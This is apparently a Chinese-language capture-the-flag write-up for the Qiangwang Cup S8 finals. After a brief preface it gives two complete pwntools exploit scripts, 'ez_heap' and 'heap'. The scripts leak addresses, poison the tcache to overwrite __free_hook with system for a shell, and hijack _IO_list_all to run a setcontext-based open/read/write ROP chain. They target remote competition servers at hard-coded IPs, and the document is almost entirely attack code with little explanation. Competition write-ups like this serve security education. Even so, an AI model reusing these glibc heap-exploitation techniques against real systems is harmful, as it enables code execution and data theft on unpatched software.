s8强网杯总决赛

前言

距离强网打完已经两周了 这两周因为忙着各种期末大作业和期末考试 到现在才有空写wp 结果发现已经把内容忘了差不多了。。。。 不过也没什么好讲解的 考察的都是比较简单的堆漏洞 难点只是需要自己构造chunk来实现一些漏洞的利用 需要攻击者对于堆的各种机制比较熟悉 以及放开思维思考

ez_heap

from pwn import*
import base64
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
#io = process("./pwn")
io = remote("8.147.129.227",34825)
elf = ELF("./pwn")
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux','splitw','-h']
libc = ELF("libc-2.31.so")

def debug():
    gdb.attach(io)
    pause()

def encode_add(payload):
    io.recvuntil("Enter your choice: ")
    io.sendline("1")
    io.recvuntil("Enter the text to encode: ")
    io.send(payload)
def decode_add(payload):
    io.recvuntil("Enter your choice: ")
    io.sendline("2")
    io.recvuntil("Enter the text to decode: ")
    encoded = base64.b64encode(payload)
    print(len(encoded)/4*3/16)
    io.send(encoded)
def remove_encode(index):
    io.recvuntil("Enter your choice: ")
    io.sendline("3")
    io.recvuntil("idx: ")
    io.sendline(str(index))
def remove_decode(index):
    io.recvuntil("Enter your choice: ")
    io.sendline("4")
    io.recvuntil("idx: ")
    io.sendline(str(index))
def show_encode(index):
    io.recvuntil("Enter your choice: ")
    io.sendline("5")
    io.recvuntil("idx: ")
    io.sendline(str(index))
def show_decode(index):
    io.recvuntil("Enter your choice: ")
    io.sendline("6")
    io.recvuntil("idx: ")
    io.sendline(str(index))

# gdb.attach(io,'b *$rebase(0x205B)')
show_encode(-51)
# pause()
io.recv()
elf_addr = u64(io.recvuntil("\x0a",drop=True)[-6:].ljust(8,b'\x00'))-0x5008
success("elf_addr :"+hex(elf_addr))

payload = cyclic(0x100)

for i in range(12):
    decode_add(payload)
for i in range(5,12):
    remove_decode(i)
remove_decode(0)
decode_add(cyclic(0x9))#0
show_decode(0)
io.recv()
libc_addr = u64(io.recvuntil("\x0a",drop=True)[-6:].ljust(8,b'\x00'))-227-libc.sym['__malloc_hook']-0x10
success("libc_addr :"+hex(libc_addr))
remove_decode(2)
remove_decode(4)
decode_add(cyclic(0xe0))#2
decode_add(cyclic(0x9))#4
show_decode(4)
io.recv()
heap_addr = u64(io.recvuntil("\x0a",drop=True)[-6:].ljust(8,b'\x00'))-0x663
success("heap_addr :"+hex(heap_addr))

free_hook = libc_addr + libc.sym['__free_hook']
malloc_hook = libc_addr + libc.sym['__malloc_hook']
decode_add(p64(free_hook))
success("elf_addr :"+hex(elf_addr))

decode_add(p64(heap_addr+0x500))#5

for i in range(8):
    decode_add(cyclic(0x100))

decode_add(cyclic(0xa0))
for i in range(7,14):
    remove_decode(i)

for i in range(7):
    decode_add(b"k"*0x10)
for i in range(7,14):
    remove_decode(i)
    
system_addr = libc_addr + libc.sym['system']

# gdb.attach(io,'b *$rebase(0x1F7C)')
number = (heap_addr+0x500)-(elf_addr+0x51a0)
a = number // 8
remove_decode(a+40)
remove_decode(4)
remove_decode(6)
for i in range(7):
    decode_add(cyclic(0x8))
decode_add(p64(free_hook))
decode_add(p64(free_hook))
remove_decode(1)
remove_decode(2)
decode_add(b"/bin/sh\x00")
decode_add(p64(system_addr))
remove_decode(1)
io.interactive()

heap

from pwn import*
from Crypto.Cipher import AES
from Crypto.Util.Padding import pad, unpad
#io = process("./pwn")
io = remote("47.94.85.95",20682)
elf = ELF("./pwn")
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux','splitw','-h']
libc = ELF("libc.so.6")

def debug():
    gdb.attach(io)
    pause()

def add(idx,content):
    io.recvuntil(">> ")
    io.sendline("1")
    io.recvuntil("idx: ")
    io.sendline(str(idx))
    io.recvuntil("content: ")
    io.send(content)

def delete(idx):
    io.recvuntil(">> ")
    io.sendline("2")
    io.recvuntil("idx: ")
    io.sendline(str(idx))

def show(idx):
    io.recvuntil(">> ")
    io.sendline("3")
    io.recvuntil("idx: ")
    io.send(str(idx))

def edit(idx,content):
    io.recvuntil(">> ")
    io.sendline("4")
    io.recvuntil("idx: ")
    io.sendline(str(idx))
    io.recvuntil("content: ")
    io.send(content)

add(0,cyclic(0x16))
delete(0)
show("0")
elf_addr = u64(io.recvuntil("\x0a",drop=True)[-6:].ljust(8,b'\x00'))-0x1bf0
success("elf_addr :"+hex(elf_addr))
add(1,"a")
delete(1)
edit(1,cyclic(0x10))
delete(1)
edit(1,b'\xa0')
add(2,"a")
add(3,"a"*8)

def encrypt(data, key):
    
    # 创建AES-ECB加密器
    cipher = AES.new(key, AES.MODE_ECB)
    
    # 填充数据
    padded_data = pad(data, AES.block_size)
    
    # 加密
    encrypted_data = cipher.encrypt(padded_data)
    return encrypted_data

key = b"aaaaaaaa".ljust(16,b'\x00')
show(0)
pre_data = io.recv(16)
data  = encrypt(pre_data,key)
heap_addr = data[:6]
heap_addr = u64(heap_addr.ljust(8,b'\x00'))-0x261
success("heap_addr :"+hex(heap_addr))

add(6,cyclic(0x10))
for i in range(50):
    add(4,"aaaa")
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x2f8))
add(4,"aaaa")
add(5,p64(0x561))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x858))
add(4,"aaaa")
add(4,p64(0x21))

delete(6)
show(6)
pre_data = io.recv(16)
data  = encrypt(pre_data,key)
libc_addr = data[:6]
libc_addr = u64(libc_addr.ljust(8,b'\x00'))-96-libc.sym['__malloc_hook']-0x10
success("libc_addr :"+hex(libc_addr))
free_hook = libc_addr + libc.sym['__free_hook']
IO_list_all = libc_addr + libc.sym['_IO_list_all']

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x20))
add(4,"aaaa")
payload = b'\x00\x00\x00\x00\x07\x00\x07\x00'
add(4,payload)

add(4,"aaaa")
add(4,"aaaa")
add(4,"aaaa")
add(4,"aaaa")
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x2f8))
add(4,"aaaa")
add(4,p64(0xc1))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x300))
add(4,"aaaa")
add(4,"aaaa")
delete(4)

add(4,"aaaa")

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x870))
add(4,"aaaa")
add(10,p64(0))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x878))
add(4,"aaaa")
add(4,p64(0x441))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x880))
add(4,"aaaa")
add(4,"aaaa")
delete(4)


delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x418))
add(4,"aaaa")
add(4,p64(IO_list_all-0x20))
add(4,"aaaa")
IO_wfile_jumps = libc_addr + libc.sym['_IO_wfile_jumps']

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x898))
add(4,"aaaa")
add(4,p64(1))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x888))
add(4,"aaaa")
add(4,p64(0))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x910))
add(4,"aaaa")
add(4,p64(heap_addr+0x300))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x948))
add(4,"aaaa")
add(4,p64(IO_wfile_jumps))

setcontext = libc_addr + libc.sym['setcontext']+61
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x368))
add(4,"aaaa")
add(4,p64(setcontext))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x318))
add(4,"aaaa")
add(4,p64(0))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x3a0))
add(4,"aaaa")
add(4,p64(heap_addr+0x300+0xf0))

ret_addr = elf_addr + 0x000000000000101a
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x3a8))
add(4,"aaaa")
add(4,p64(ret_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x3e0))
add(4,"aaaa")
add(4,p64(heap_addr+0x300))

rdi_addr = libc_addr + next(libc.search(asm("pop rdi;ret")))
rsi_addr = libc_addr + next(libc.search(asm("pop rsi;ret")))
rdx_r12_addr = libc_addr + 0x0000000000119431
read_addr = libc_addr + libc.sym['read']
open_addr = libc_addr + libc.sym['open']
write_addr = libc_addr + libc.sym['write']
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x3f0))
add(4,"aaaa")
add(4,p64(rdi_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x600))
add(4,"aaaa")
add(4,b'flag\x00\x00\x00\x00')

flag_addr = heap_addr + 0x600
delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x3f8))
add(4,"aaaa")
add(4,p64(flag_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x400))
add(4,"aaaa")
add(4,p64(rsi_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x410))
add(4,"aaaa")
add(4,p64(open_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x418))
add(4,"aaaa")
add(4,p64(rdi_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x420))
add(4,"aaaa")
add(4,p64(3))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x428))
add(4,"aaaa")
add(4,p64(rsi_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x430))
add(4,"aaaa")
add(4,p64(heap_addr+0xb00))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x438))
add(4,"aaaa")
add(4,p64(rdx_r12_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x440))
add(4,"aaaa")
add(4,p64(0x100))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x448))
add(4,"aaaa")
add(4,p64(0))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x450))
add(4,"aaaa")
add(4,p64(read_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x458))
add(4,"aaaa")
add(4,p64(rdi_addr))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x460))
add(4,"aaaa")
add(4,p64(1))

delete(0)
edit(0,cyclic(0x10))
delete(0)
edit(0,p64(heap_addr+0x468))
add(4,"aaaa")
add(4,p64(write_addr))

# gdb.attach(io,'b *_IO_wdoallocbuf+43')
delete(100)
# pause()

flag = io.recvuntil("}")
print(flag)